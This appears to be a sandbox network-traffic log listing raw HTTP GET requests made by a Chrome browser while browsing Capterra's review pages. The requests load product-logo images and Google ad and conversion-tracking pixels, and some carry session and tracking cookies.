Source: global traffic HTTP traffic detected: GET /ProductLogo/95b201e8-845a-4064-a9b2-a8eb49d19ca3.png?w=60&h=60&dpr=2&auto=format HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://reviews.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /ProductLogo/537ec30a-379d-42ed-9912-75af8cb47205.png?w=60&h=60&dpr=2&auto=format HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://reviews.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /ProductLogo/44e20468-ea22-4d70-9132-b88c151348b5.png?w=60&h=60&dpr=2&auto=format HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /ProductLogo/82a342f4-1d08-4265-877a-83f0d7b3858f.png?w=60&h=60&dpr=2&auto=format HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /ProductLogo/3f97e69e-54a0-4b38-95b7-c226481cff4c.png?w=60&h=60&dpr=2&auto=format HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /ProductLogo/5152f7c6-61ed-4168-b89f-f436d97ebccd.png?w=60&h=60&dpr=2&auto=format HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /ProductLogo/464cd3be-e2b8-4f9b-a572-577e31770f58.png?w=60&h=60&dpr=2&auto=format HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://reviews.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /ant_squire HTTP/1.1Host: d-ipv6.mmapiws.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /activity;register_conversion=1;src=8036043;type=visit;cat=capte0;ord=1421174349590;npa=0;auiddc=1810143887.1725034608;ps=1;pcor=1226563587;uaa=x86;uab=64;uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132;uamb=0;uam=;uap=Windows;uapv=10.0.0;uaw=0;pscdl=noapi;frm=0;gtm=45fe48s0v9181622439z876106154za201zb76106154;gcs=G111;gcd=13t3t3t3t5l1;dma=0;tag_exp=0;epver=2;~oref=https%3A%2F%2Freviews.capterra.com%2Fsearch%2F? HTTP/1.1Host: ad.doubleclick.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAttribution-Reporting-Eligible: trigger, event-source;navigation-sourceReferer: https://reviews.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: ar_debug=1; IDE=AHWqTUnshLIM_CA9spkc8qZwYRIRrmQl4yeqfJZGLqc8fJU-I1ZDHzeNKdWNuA9P
Source: global traffic HTTP traffic detected: GET /pagead/viewthroughconversion/1072635088/?random=1725034620739&cv=11&fst=1725034620739&bg=ffffff&guid=ON&async=1&gtm=45be48s0z876106154za201zb76106154&gcd=13t3t3t3t5l1&dma=0&tag_exp=0&u_w=1280&u_h=1024&url=https%3A%2F%2Freviews.capterra.com%2Fsearch%2F&ref=https%3A%2F%2Fwww.capterra.com%2F&hn=www.googleadservices.com&frm=0&tiba=Capterra%20%7C%20Review%20Software&npa=0&pscdl=noapi&auid=1810143887.1725034608&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=ads_data_redaction%3Dfalse&rfmt=3&fmt=4 HTTP/1.1Host: googleads.g.doubleclick.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: ar_debug=1; IDE=AHWqTUnshLIM_CA9spkc8qZwYRIRrmQl4yeqfJZGLqc8fJU-I1ZDHzeNKdWNuA9P
Source: global traffic HTTP traffic detected: GET /ddm/fls/z/dc_pre=CI324N-OnYgDFWyEJwId1n8yjA;src=8036043;type=visit;cat=capte0;ord=1421174349590;npa=0;auiddc=*;ps=1;pcor=1226563587;uaa=x86;uab=64;uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132;uamb=0;uam=;uap=Windows;uapv=10.0.0;uaw=0;pscdl=noapi;frm=0;gtm=45fe48s0v9181622439z876106154za201zb76106154;gcs=G111;gcd=13t3t3t3t5l1;dma=0;tag_exp=0;epver=2;~oref=https%3A%2F%2Freviews.capterra.com%2Fsearch%2F HTTP/1.1Host: adservice.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://8036043.fls.doubleclick.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /fsrelay/rec/page HTTP/1.1Host: reviews.capterra.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=DgAviE5NrWIOacSPhZ06rIgXoWumaFLCS70K33ZQgWk-1725034598-1.0.1.1-pnAE6aN37Q.cKX00Zyt72LoinovhYuQs5ezzjN4k9CFi5rVtlrAWTnXJjkBmksrYtBAuRTYJaDujIzEqSuzM6Q; _cfuvid=FURX91998Y9ROB2LKznik9Tt9vrpIYkoJDK0lFut7h8-1725034598236-0.0.1.1-604800000; _gid=GA1.2.849437591.1725034605; _capterra2_session=d9578f80036392cbe7d054555f3de48f; _gcl_au=1.1.1810143887.1725034608; _ga=GA1.1.1968510630.1725034605; OptanonConsent=isGpcEnabled=0&datestamp=Fri+Aug+30+2024+12%3A16%3A51+GMT-0400+(Eastern+Daylight+Time)&version=202403.2.0&browserGpcFlag=0&isIABGlobal=false&hosts=&consentId=e27a75a5-de1d-457f-a747-920e05970698&interactionCount=0&isAnonUser=1&landingPath=https%3A%2F%2Fwww.capterra.com%2Fp%2F145471%2FPublicate%2F&groups=C0007%3A1%2CC0004%3A1%2CC0002%3A1%2CC0003%3A1%2CC0001%3A1; utm=%7B%7D; lang=en; rx-sid=4a2a7960-9ed8-4374-809f-0a80cf9fe6be; _ga_M5DGBDHG2R=GS1.1.1725034607.1.1.1725034620.47.0.0; __mmapiwsid=0191a413-777d-7f0e-8692-1332553a85ac:1b0310bf727feb6b0af3dec08c5bfd86689f2e28; fs_lua=1.1725034624710; fs_uid=#18VAT4#da9f39f7-d4a4-45f4-948f-86299cb47816:084a7745-8adb-4b14-adf2-26e4e4ddbd6e:1725034624710::1#/1756570623; _dd_s=rum=2&id=4fa9531a-0489-4113-8ff1-2b1a393f6f32&created=1725034617802&expire=1725035517802
Source: global traffic HTTP traffic detected: GET /ProductLogo/db285424-c32d-461f-9382-c24a52b4c2ef.png?w=60&h=60&dpr=2&auto=format HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /ProductLogo/f5157b6b-4b64-4b26-9928-cdc78f98b182.png?w=60&h=60&dpr=2&auto=format HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://reviews.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /ProductLogo/a5d35bcd-e674-49ae-b851-7c2579a7969f.jpeg?w=60&h=60&dpr=2&auto=format HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /ProductLogo/bcf1f306-bfbc-4489-9efe-4cea2b273e4e.png?w=60&h=60&dpr=2&auto=format HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /ProductLogo/b6523a00-951e-4e60-b7e0-a904d177d6dd.png?w=60&h=60&dpr=2&auto=format HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://reviews.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /ProductLogo/67665783-bd0d-4b97-99af-c628a74ea005.png?w=60&h=60&dpr=2&auto=format HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://reviews.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /ProductLogo/98ca9b83-b6bd-4a44-92d1-63c526d17630.png?w=60&h=60&dpr=2&auto=format HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://reviews.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /ProductLogo/f94dcf3a-e9ef-4673-80a0-d25bd50a393d.png?w=60&h=60&dpr=2&auto=format HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://reviews.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /ProductLogo/95b201e8-845a-4064-a9b2-a8eb49d19ca3.png?w=60&h=60&dpr=2&auto=format HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /ProductLogo/537ec30a-379d-42ed-9912-75af8cb47205.png?w=60&h=60&dpr=2&auto=format HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /ProductLogo/464cd3be-e2b8-4f9b-a572-577e31770f58.png?w=60&h=60&dpr=2&auto=format HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /ProductLogo/f5157b6b-4b64-4b26-9928-cdc78f98b182.png?w=60&h=60&dpr=2&auto=format HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /ddm/fls/z/dc_pre=CI324N-OnYgDFWyEJwId1n8yjA;src=8036043;type=visit;cat=capte0;ord=1421174349590;npa=0;auiddc=*;ps=1;pcor=1226563587;uaa=x86;uab=64;uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132;uamb=0;uam=;uap=Windows;uapv=10.0.0;uaw=0;pscdl=noapi;frm=0;gtm=45fe48s0v9181622439z876106154za201zb76106154;gcs=G111;gcd=13t3t3t3t5l1;dma=0;tag_exp=0;epver=2;~oref=https%3A%2F%2Freviews.capterra.com%2Fsearch%2F HTTP/1.1Host: adservice.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /activity;register_conversion=1;src=8036043;type=visit;cat=capte0;ord=1421174349590;npa=0;auiddc=1810143887.1725034608;ps=1;pcor=1226563587;uaa=x86;uab=64;uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132;uamb=0;uam=;uap=Windows;uapv=10.0.0;uaw=0;pscdl=noapi;frm=0;gtm=45fe48s0v9181622439z876106154za201zb76106154;gcs=G111;gcd=13t3t3t3t5l1;dma=0;tag_exp=0;epver=2;~oref=https%3A%2F%2Freviews.capterra.com%2Fsearch%2F? HTTP/1.1Host: ad.doubleclick.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: ar_debug=1; IDE=AHWqTUnshLIM_CA9spkc8qZwYRIRrmQl4yeqfJZGLqc8fJU-I1ZDHzeNKdWNuA9P
Source: global traffic HTTP traffic detected: GET /ProductLogo/b6523a00-951e-4e60-b7e0-a904d177d6dd.png?w=60&h=60&dpr=2&auto=format HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /ProductLogo/67711109-055d-46d1-bf60-43ba35ef896d.png?w=60&h=60&dpr=2&auto=format HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://reviews.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /ProductLogo/9f57a44f-9475-4cc5-9886-3822c18b54d1.png?w=60&h=60&dpr=2&auto=format HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://reviews.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /ProductLogo/67665783-bd0d-4b97-99af-c628a74ea005.png?w=60&h=60&dpr=2&auto=format HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /ProductLogo/f0d90c26-fb48-482e-bfed-fd16809bc437.png?w=60&h=60&dpr=2&auto=format HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://reviews.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /ProductLogo/f94dcf3a-e9ef-4673-80a0-d25bd50a393d.png?w=60&h=60&dpr=2&auto=format HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /ProductLogo/442879c8-fca4-4a7c-b165-49dc05cf7999.png?w=60&h=60&dpr=2&auto=format HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://reviews.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /ProductLogo/98ca9b83-b6bd-4a44-92d1-63c526d17630.png?w=60&h=60&dpr=2&auto=format HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /ProductLogo/8d54c31f-ffb8-435c-9795-73330c5d470c.png?w=60&h=60&dpr=2&auto=format HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://reviews.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /ProductLogo/ed3785e7-b737-401b-819f-b042945c26a2.png?w=60&h=60&dpr=2&auto=format HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://reviews.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
